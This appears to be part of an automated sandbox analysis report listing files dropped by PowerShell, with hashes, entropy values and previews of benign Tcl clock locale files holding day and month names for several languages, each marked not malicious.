                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ru DAYS_OF_WEEK_ABBREV [list \.. "\u0412\u0441"\.. "\u041f\u043d"\.. "\u0412\u0442"\.. "\u0421\u0440"\.. "\u0427\u0442"\.. "\u041f\u0442"\.. "\u0421\u0431"].. ::msgcat::mcset ru DAYS_OF_WEEK_FULL [list \.. "\u0432\u043e\u0441\u043a\u0440\u0435\u0441\u0435\u043d\u044c\u0435"\.. "\u043f\u043e\u043d\u0435\u0434\u0435\u043b\u044c\u043d\u0438\u043a"\.. "\u0432\u0442\u043e\u0440\u043d\u0438\u043a"\.. "\u0441\u0440\u0435\u0434\u0430"\.. "\u0447\u0435\u0442\u0432\u0435\u0440\u0433"\.. "\u043f\u044f\u0442\u043d\u0438\u0446\u0430"\.. "\u0441\u0443\u0431\u0431\u043e\u0442\u0430"].. ::msgcat::mcset ru MONTHS_ABBREV [list \.. "\u044f\u043d\u0432"\.. "\u0444\u0435\u0432"\.. "\u043c\u0430\u0440"\.. "\u0430\u043f\u0440"\.. "\u043c\u0430\u0439"\.. "\u0438\u044e\u
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):248
                                                                                                                                                                                                                      Entropy (8bit):4.9420431225061
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoVAgWIZoVY9X3vtfNrsoVA9+3vW6Q9vn:4EnLB383SFWIyaX3vtNl/3vWHNn
                                                                                                                                                                                                                      MD5:DC98D88964650E302BE97FDB3B33326E
                                                                                                                                                                                                                      SHA1:1DDDCC4265D7B980B867FEE674BEF2FD87D823F7
                                                                                                                                                                                                                      SHA-256:13E4E79A0ED82034BADE0CFF8DEF5DE1222F6968108AD710662BDB7DAF36D7E1
                                                                                                                                                                                                                      SHA-512:F3B9D528C529DD520FEDA3C20ED354E521C5B3C29F3317E15B7939CE06A3D67554D34DD6E54FE038585E46C560C604A1FD7E7F84914086B5994D52CE2C9E99CE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ru_UA DATE_FORMAT "%d.%m.%Y".. ::msgcat::mcset ru_UA TIME_FORMAT "%k:%M:%S".. ::msgcat::mcset ru_UA DATE_TIME_FORMAT "%d.%m.%Y %k:%M:%S %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1212
                                                                                                                                                                                                                      Entropy (8bit):4.359036493565628
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83/YIXo4YY0dD6kMm7fX2NaSIvZdHZgHZ/IxvaGWxvtl9svWTN:43rLTR44/yWltOWB
                                                                                                                                                                                                                      MD5:E297221FA73BD78577B398BC7D061D21
                                                                                                                                                                                                                      SHA1:F2A6B456272F913A9E97C495CEE73AC774C90FA1
                                                                                                                                                                                                                      SHA-256:E65D6E5E837DF0A2DF0DB77BCE45334BBC27EFFF9023C37119E75D49932D9D6C
                                                                                                                                                                                                                      SHA-512:AB9DDAE7CB21193C7753041F0B88CF2D40987E7E604B47816219458D217F084AA4EBF36719E22AAB3FD71A271D9F956ADC353182991903D7ADE8C8F00F6B2F9B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sh DAYS_OF_WEEK_ABBREV [list \.. "Ned"\.. "Pon"\.. "Uto"\.. "Sre"\.. "\u010cet"\.. "Pet"\.. "Sub"].. ::msgcat::mcset sh DAYS_OF_WEEK_FULL [list \.. "Nedelja"\.. "Ponedeljak"\.. "Utorak"\.. "Sreda"\.. "\u010cetvrtak"\.. "Petak"\.. "Subota"].. ::msgcat::mcset sh MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Maj"\.. "Jun"\.. "Jul"\.. "Avg"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset sh MONTHS_FULL [list \.. "Januar"\.. "Februar"\.. "Mart"\.. "April"\.. "Maj"\.. "Juni"\.. "Juli"\.. "Avgust"\.. "Septembar"\.. "Oktobar"\.. "Novembar"\.. "Decembar"\.. ""].. ::msgcat::mcset sh BC
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1255
                                                                                                                                                                                                                      Entropy (8bit):4.4043119723436135
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83c46o40u3rIsmJIcm93ApLDVb2IcU95WFGEXF3eUCvtz/v3e6:43c3ow3rF93Ap7tEXFREtznp
                                                                                                                                                                                                                      MD5:24DA40901D907D35195CC1B3A675EBC7
                                                                                                                                                                                                                      SHA1:8AF31248F06FADA5CFB0D83A940CFF5CE70E2577
                                                                                                                                                                                                                      SHA-256:976813F6C53C9BEBBF976B0F560FD7FC5E4EC4C574D7E1CD31F9A4056765CB7A
                                                                                                                                                                                                                      SHA-512:A9BC6AAFE9AEEDFD1E483E54A2D27871A09ADD6807D8F90410CD2BB82A91BA9DF435652EC9A7C3AD0A080D7F153CA848BB47DAD3936BA30E4AEFF3C474C433CC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sk DAYS_OF_WEEK_ABBREV [list \.. "Ne"\.. "Po"\.. "Ut"\.. "St"\.. "\u0160t"\.. "Pa"\.. "So"].. ::msgcat::mcset sk DAYS_OF_WEEK_FULL [list \.. "Nede\u013ee"\.. "Pondelok"\.. "Utorok"\.. "Streda"\.. "\u0160tvrtok"\.. "Piatok"\.. "Sobota"].. ::msgcat::mcset sk MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "m\u00e1j"\.. "j\u00fan"\.. "j\u00fal"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sk MONTHS_FULL [list \.. "janu\u00e1r"\.. "febru\u00e1r"\.. "marec"\.. "apr\u00edl"\.. "m\u00e1j"\.. "j\u00fan"\.. "j\u00fal"\.. "august"\.. "september"\.. "okt\u00f3ber"\.. "november"\.. "decem
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1216
                                                                                                                                                                                                                      Entropy (8bit):4.333705818952628
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83MIXpC9opYuGS/BrIsmZ5hv1yAxyIVjd392WFThENvt0vJoO:43fXYujZrqyApYJtyR
                                                                                                                                                                                                                      MD5:CB76F54CBE0D1AAE8BA956B4C51CBD2A
                                                                                                                                                                                                                      SHA1:C1F78375EDB0BD2504553E33B2024C0C63FDB1B2
                                                                                                                                                                                                                      SHA-256:11A6264676DBED87E4F718075127E32E107854F35F141642454F484984084486
                                                                                                                                                                                                                      SHA-512:69964348FF08DE6EEB5E3DD61057FF0DF5441105EB7BEE7FB7E9AC5E26DCC164E3C7C011CA5CD7BC5B97A7872532331C97CCBC80563F6C5A3548014BFA8BEF16
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sl DAYS_OF_WEEK_ABBREV [list \.. "Ned"\.. "Pon"\.. "Tor"\.. "Sre"\.. "\u010cet"\.. "Pet"\.. "Sob"].. ::msgcat::mcset sl DAYS_OF_WEEK_FULL [list \.. "Nedelja"\.. "Ponedeljek"\.. "Torek"\.. "Sreda"\.. "\u010cetrtek"\.. "Petek"\.. "Sobota"].. ::msgcat::mcset sl MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "avg"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sl MONTHS_FULL [list \.. "januar"\.. "februar"\.. "marec"\.. "april"\.. "maj"\.. "junij"\.. "julij"\.. "avgust"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat::mcset sl B
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1321
                                                                                                                                                                                                                      Entropy (8bit):4.408176575111904
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83F7ONQEwXwjjTlVoSEh76W/X+WZQJ4hv+H6v2V:43NwjPEwl4VQ8q
                                                                                                                                                                                                                      MD5:E606F620F03EC0FBDBE6551601299C5F
                                                                                                                                                                                                                      SHA1:0B50AB679E8D90D8E7319BCADAC426E004594D3B
                                                                                                                                                                                                                      SHA-256:1F4EFD78F6B45B65F73F09B2F52FC13C2A7C4138DCB7664804878D197B6EBDF9
                                                                                                                                                                                                                      SHA-512:08AF2B51EB7111E334ADDA3A03F9A8816C104E9742B523EC363FB5131A3DF73D298A8DDCD573D23C23C65CCFD2B8898DF75AE3D4F04BF80744044FB6BAB5EC0A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sq DAYS_OF_WEEK_ABBREV [list \.. "Die"\.. "H\u00ebn"\.. "Mar"\.. "M\u00ebr"\.. "Enj"\.. "Pre"\.. "Sht"].. ::msgcat::mcset sq DAYS_OF_WEEK_FULL [list \.. "e diel"\.. "e h\u00ebn\u00eb"\.. "e mart\u00eb"\.. "e m\u00ebrkur\u00eb"\.. "e enjte"\.. "e premte"\.. "e shtun\u00eb"].. ::msgcat::mcset sq MONTHS_ABBREV [list \.. "Jan"\.. "Shk"\.. "Mar"\.. "Pri"\.. "Maj"\.. "Qer"\.. "Kor"\.. "Gsh"\.. "Sht"\.. "Tet"\.. "N\u00ebn"\.. "Dhj"\.. ""].. ::msgcat::mcset sq MONTHS_FULL [list \.. "janar"\.. "shkurt"\.. "mars"\.. "prill"\.. "maj"\.. "qershor"\.. "korrik"\.. "gusht"\.. "shtator"\.. "tetor"\.. "n\u00ebntor"\.. "dhjetor"\.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2087
                                                                                                                                                                                                                      Entropy (8bit):4.307749748884122
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:43ilQTSBQrQP9QenzMKSFD9NI/QiNQEQrQL1KKYjU5rtAx:2I5EyLMKSFZNIYMzYMKKiqW
                                                                                                                                                                                                                      MD5:BF363AB60B57F6D8FDCDBFD230A28DDF
                                                                                                                                                                                                                      SHA1:6375CBA0A2197DA7E65BEE45C42F02C4F0B9142D
                                                                                                                                                                                                                      SHA-256:FA00A7B22C9941F6C2B893F22B703DCB159CA2F2E4005FD6A74A632AEB786BFA
                                                                                                                                                                                                                      SHA-512:91AD8085EF321A5A0E4D2ED204940CB66E8E230BBEDE59A8A07D1CEED9155FCC6B075A1FCC44AE834C1FEEEB3A59256C4310684C5AC453D4C50DFABD88469814
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sr DAYS_OF_WEEK_ABBREV [list \.. "\u041d\u0435\u0434"\.. "\u041f\u043e\u043d"\.. "\u0423\u0442\u043e"\.. "\u0421\u0440\u0435"\.. "\u0427\u0435\u0442"\.. "\u041f\u0435\u0442"\.. "\u0421\u0443\u0431"].. ::msgcat::mcset sr DAYS_OF_WEEK_FULL [list \.. "\u041d\u0435\u0434\u0435\u0459\u0430"\.. "\u041f\u043e\u043d\u0435\u0434\u0435\u0459\u0430\u043a"\.. "\u0423\u0442\u043e\u0440\u0430\u043a"\.. "\u0421\u0440\u0435\u0434\u0430"\.. "\u0427\u0435\u0442\u0432\u0440\u0442\u0430\u043a"\.. "\u041f\u0435\u0442\u0430\u043a"\.. "\u0421\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset sr MONTHS_ABBREV [list \.. "\u0408\u0430\u043d"\.. "\u0424\u0435\u0431"\.. "\u041c\u0430\u0440"\.. "\u0410\u043f\u0440"\.. "\u041c\u0430\u0458"\.. "\u0408\u0443\u043d"\.. "\
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1219
                                                                                                                                                                                                                      Entropy (8bit):4.3542418837714285
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83qoLt6yLQoAusrIsmZ5m4AcjTHX92WFfjr4MvBvX:43ZLxQNusrr4Aw3Jkq1X
                                                                                                                                                                                                                      MD5:3B5C3FFA0829768470BDA1B46D882060
                                                                                                                                                                                                                      SHA1:C96799036EC5CCDE799A6B50CD7748908935A2F3
                                                                                                                                                                                                                      SHA-256:483916B51BD7E071E88F9EC36AAF3E08FEA823991532F832DE491C6C40B55A9F
                                                                                                                                                                                                                      SHA-512:684FA249123878AA7F856DF0FD3B0D9F041113CFEA8EEFA47D0E1948DA23694330BF0D62BA896A3891CD559C16CAE9330BF31508F530AC003D2929D5FD9246D8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sv DAYS_OF_WEEK_ABBREV [list \.. "s\u00f6"\.. "m\u00e5"\.. "ti"\.. "on"\.. "to"\.. "fr"\.. "l\u00f6"].. ::msgcat::mcset sv DAYS_OF_WEEK_FULL [list \.. "s\u00f6ndag"\.. "m\u00e5ndag"\.. "tisdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "l\u00f6rdag"].. ::msgcat::mcset sv MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sv MONTHS_FULL [list \.. "januari"\.. "februari"\.. "mars"\.. "april"\.. "maj"\.. "juni"\.. "juli"\.. "augusti"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat:
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1040
                                                                                                                                                                                                                      Entropy (8bit):4.108744949579904
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:4EnLB383A4mScvhkzoR4mtuWckRkoay3UVxMmALfG7IdzVJ633xRCPLMYMvYo76u:4aR83/Shkz1uckO76kMmEf62qOTdMvvn
                                                                                                                                                                                                                      MD5:5774860C8AEECBD48F1502E616158CAB
                                                                                                                                                                                                                      SHA1:DE7059713EA7913A0C79F5386833CE2BCAD2CFD7
                                                                                                                                                                                                                      SHA-256:1DA068C9AA02EF14A2440758C6040D632D96044A20EC501DBB9E40D8592E0E7F
                                                                                                                                                                                                                      SHA-512:91E69222DDF55E9E0E389DB77D7A0F2E082351DC3FB34A1A2C1E350E4187E8BB940F6C2EDE1B8651159C2787AA0BE4D7268F33F7A82CAED03514FCE462530408
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sw DAYS_OF_WEEK_ABBREV [list \.. "Jpi"\.. "Jtt"\.. "Jnn"\.. "Jtn"\.. "Alh"\.. "Iju"\.. "Jmo"].. ::msgcat::mcset sw DAYS_OF_WEEK_FULL [list \.. "Jumapili"\.. "Jumatatu"\.. "Jumanne"\.. "Jumatano"\.. "Alhamisi"\.. "Ijumaa"\.. "Jumamosi"].. ::msgcat::mcset sw MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Ago"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Des"\.. ""].. ::msgcat::mcset sw MONTHS_FULL [list \.. "Januari"\.. "Februari"\.. "Machi"\.. "Aprili"\.. "Mei"\.. "Juni"\.. "Julai"\.. "Agosti"\.. "Septemba"\.. "Oktoba"\.. "Novemba"\.. "Desemba"\.. ""].. ::msgcat::mcset sw BCE "
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1874
                                                                                                                                                                                                                      Entropy (8bit):4.080580566597515
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83AI0xnJdnQhmHlHYPKtul+eOPfIxyH5ztUSLu8tptLtrl+eOPfIxyH5ztUSU:43N0dQmHlHYPKtu1HxMtr1Hx/
                                                                                                                                                                                                                      MD5:85288236C3997302EA26D7403BBA2C15
                                                                                                                                                                                                                      SHA1:05AB389CC4DCF17B37BFF6ED1ECD58D6E9850A01
                                                                                                                                                                                                                      SHA-256:AEFDC4255890D5B3FFE5CEE1B457B7D711283C2287ABA644155C10956012F6C1
                                                                                                                                                                                                                      SHA-512:8E389D46606176EE14B8356153095B49C9426B80139B672A620F488891F091D1A272D4FB116775900E4AB4EC84DDDEBD8D6AF81AC672F14F148F2BFC638D2B10
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ta DAYS_OF_WEEK_FULL [list \.. "\u0b9e\u0bbe\u0baf\u0bbf\u0bb1\u0bc1"\.. "\u0ba4\u0bbf\u0b99\u0bcd\u0b95\u0bb3\u0bcd"\.. "\u0b9a\u0bc6\u0bb5\u0bcd\u0bb5\u0bbe\u0baf\u0bcd"\.. "\u0baa\u0bc1\u0ba4\u0ba9\u0bcd"\.. "\u0bb5\u0bbf\u0baf\u0bbe\u0bb4\u0ba9\u0bcd"\.. "\u0bb5\u0bc6\u0bb3\u0bcd\u0bb3\u0bbf"\.. "\u0b9a\u0ba9\u0bbf"].. ::msgcat::mcset ta MONTHS_ABBREV [list \.. "\u0b9c\u0ba9\u0bb5\u0bb0\u0bbf"\.. "\u0baa\u0bc6\u0baa\u0bcd\u0bb0\u0bb5\u0bb0\u0bbf"\.. "\u0bae\u0bbe\u0bb0\u0bcd\u0b9a\u0bcd"\.. "\u0b8f\u0baa\u0bcd\u0bb0\u0bb2\u0bcd"\.. "\u0bae\u0bc7"\.. "\u0b9c\u0bc2\u0ba9\u0bcd"\.. "\u0b9c\u0bc2\u0bb2\u0bc8"\.. "\u0b86\u0b95\u0bb8\u0bcd\u0b9f\u0bcd"\.. "\u0b9a\u0bc6\u0baa\u0bcd\u0b9f\u0bae\u0bcd\u0baa\u0bb0\u0bcd"\.. "\u0b85\u0b95\u0bcd\u0b9f\u0bcb\u0baa\u0bb0\u0bcd"\.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):257
                                                                                                                                                                                                                      Entropy (8bit):4.863003494480733
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xosDv+IZosK3v6ry/5osDo+3v+6f6HyFvn:4EnLB383ZDvl5K3v6ry/ZDF3vmSVn
                                                                                                                                                                                                                      MD5:CF078352DA0507C767F04E31D6C14296
                                                                                                                                                                                                                      SHA1:0A9B1255BD85B60D3620AE61370F54748AB7A182
                                                                                                                                                                                                                      SHA-256:4978A193076DE56944236F7F1DCECACFF739536DFB3DBEFC1F7FE2B97A8AEAF4
                                                                                                                                                                                                                      SHA-512:6FFC85B2A8DECB373EC76B1CD1A9459A30E443319F2C8DB9BBE6E115F5EFEEBAC314D4E8BE996EA55EE46466C6F6057A73078F5FDCF1C4CBAF1A270E45BC10C0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ta_IN DATE_FORMAT "%d %M %Y".. ::msgcat::mcset ta_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset ta_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2149
                                                                                                                                                                                                                      Entropy (8bit):4.097884113767283
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:43a8mxI9k3JR0UjjFbPcniLHVktjjFbPcniLHVM:2a8v9k3JdbPcIidbPcIG
                                                                                                                                                                                                                      MD5:61E4CB2AAD66285E9113071057F39C35
                                                                                                                                                                                                                      SHA1:A2BD21090859669C4B6A875E077825381B7E2702
                                                                                                                                                                                                                      SHA-256:9E96C7123100234A7018533764502985A208F2EB3314F5B6332D46016725A63F
                                                                                                                                                                                                                      SHA-512:589A2D65508B07B5FDEDA883F71A4B496B25458CA1ECE7C4D4F5DAE82EB683DA82C8E21E57D63A235AB600174C9D362A746B2E27BAA6E3ADE1B7BD9D6000BE27
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset te DAYS_OF_WEEK_ABBREV [list \.. "\u0c06\u0c26\u0c3f"\.. "\u0c38\u0c4b\u0c2e"\.. "\u0c2e\u0c02\u0c17\u0c33"\.. "\u0c2c\u0c41\u0c27"\.. "\u0c17\u0c41\u0c30\u0c41"\.. "\u0c36\u0c41\u0c15\u0c4d\u0c30"\.. "\u0c36\u0c28\u0c3f"].. ::msgcat::mcset te DAYS_OF_WEEK_FULL [list \.. "\u0c06\u0c26\u0c3f\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c38\u0c4b\u0c2e\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c2e\u0c02\u0c17\u0c33\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c2c\u0c41\u0c27\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c17\u0c41\u0c30\u0c41\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c36\u0c41\u0c15\u0c4d\u0c30\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c36\u0c28\u0c3f\u0c35\u0c3e\u0c30\u0c02"].. ::msgcat::mcset te MONTHS_ABBREV [list \.. "\u0c1c\u0c28\u0c35\u0c30\u0c3f"\.. "\u0c2b\u0c3f\u0c2c\u0c4d\u0c30\u0c35\u0c30\u0c3f"\.. "\u0c2e\u0c3
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):419
                                                                                                                                                                                                                      Entropy (8bit):5.058324650031252
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:4EnLB383LjZWsn0sHjoD0savzda3v6ry/ZF3vMSVn:4aR833Z1nnHjoDnavzd8vSCZNvMSV
                                                                                                                                                                                                                      MD5:BCA040A356E7E8CC597EFB9B9065F8E1
                                                                                                                                                                                                                      SHA1:ADAF7EC8C2035BC06E168D3F1BD7F39277E9273F
                                                                                                                                                                                                                      SHA-256:B110FEEDDA21ECCEFA624BEF8E1476E9F221FB253880AC370967AE4D0237CA7A
                                                                                                                                                                                                                      SHA-512:D408ECE8CF89FB23B45420D3CBA7655EEE713498210889A84EE25D3417360705546D97028EAAAA47764B6E9B0A3699669B98C0A53861A38E0DFCB9F3B8A47BEC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset te_IN AM "\u0c2a\u0c42\u0c30\u0c4d\u0c35\u0c3e\u0c39\u0c4d\u0c28".. ::msgcat::mcset te_IN PM "\u0c05\u0c2a\u0c30\u0c3e\u0c39\u0c4d\u0c28".. ::msgcat::mcset te_IN DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset te_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset te_IN DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2359
                                                                                                                                                                                                                      Entropy (8bit):4.382796122808316
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:439X4QKPQJecQwFA0P9JmDsxQ7KHfWkD2CQM0DnWxFDzCYmdrtVP:29ohCi1028QmHfIC4jW3DmHB
                                                                                                                                                                                                                      MD5:7F61E1EA256D78948189EF07119663CD
                                                                                                                                                                                                                      SHA1:6867E9780049FACE9984B7788B6F362B8D1AD718
                                                                                                                                                                                                                      SHA-256:48BEAF693BF5B6EED15234DB0D375B97E6D576A749E9048420C153E6CAFC0259
                                                                                                                                                                                                                      SHA-512:F3E24E0B41A7D722AC2FA0E429A2DCB1CCB5BAECC9912ADF6AF79C51366EA1AC9F931F0F44F068F3CEE6873516E6223CC5E7616CF523B1DFB9E528DE4D58454A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset th DAYS_OF_WEEK_ABBREV [list \.. "\u0e2d\u0e32."\.. "\u0e08."\.. "\u0e2d."\.. "\u0e1e."\.. "\u0e1e\u0e24."\.. "\u0e28."\.. "\u0e2a."].. ::msgcat::mcset th DAYS_OF_WEEK_FULL [list \.. "\u0e27\u0e31\u0e19\u0e2d\u0e32\u0e17\u0e34\u0e15\u0e22\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e08\u0e31\u0e19\u0e17\u0e23\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e2d\u0e31\u0e07\u0e04\u0e32\u0e23"\.. "\u0e27\u0e31\u0e19\u0e1e\u0e38\u0e18"\.. "\u0e27\u0e31\u0e19\u0e1e\u0e24\u0e2b\u0e31\u0e2a\u0e1a\u0e14\u0e35"\.. "\u0e27\u0e31\u0e19\u0e28\u0e38\u0e01\u0e23\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e40\u0e2a\u0e32\u0e23\u0e4c"].. ::msgcat::mcset th MONTHS_ABBREV [list \.. "\u0e21.\u0e04."\.. "\u0e01.\u0e1e."\.. "\u0e21\u0e35.\u0e04."\.. "\u0e40\u0e21.\u0e22."\.. "\u0e1e.\u0e04."\.. "\u0e21\u0
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1183
                                                                                                                                                                                                                      Entropy (8bit):4.390397293529625
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83ZVUflVdq4qTr6dyX59508THHCh5LbQgWiNv9KvWIn:43PXTtbTngLhWiJGWIn
                                                                                                                                                                                                                      MD5:017F0F989BD5DBBF25E7C797CE09C45C
                                                                                                                                                                                                                      SHA1:162922DBD55A31A74410375A36EE7BC50E092BDD
                                                                                                                                                                                                                      SHA-256:4B85B345D6C43F7257C6849A60A492397FD5FD9D82DF3A2252189D7A1ECCBB64
                                                                                                                                                                                                                      SHA-512:73B6CF395753D863330687404E8A584CB08B81A8CC456DCE7BB49C4EA15EA19E45E3CC1E1367E10915DE14AC6258383289BCFEF55AD2768A50889DF390D37EF9
                                                                                                                                                                                                                      Malicious:false
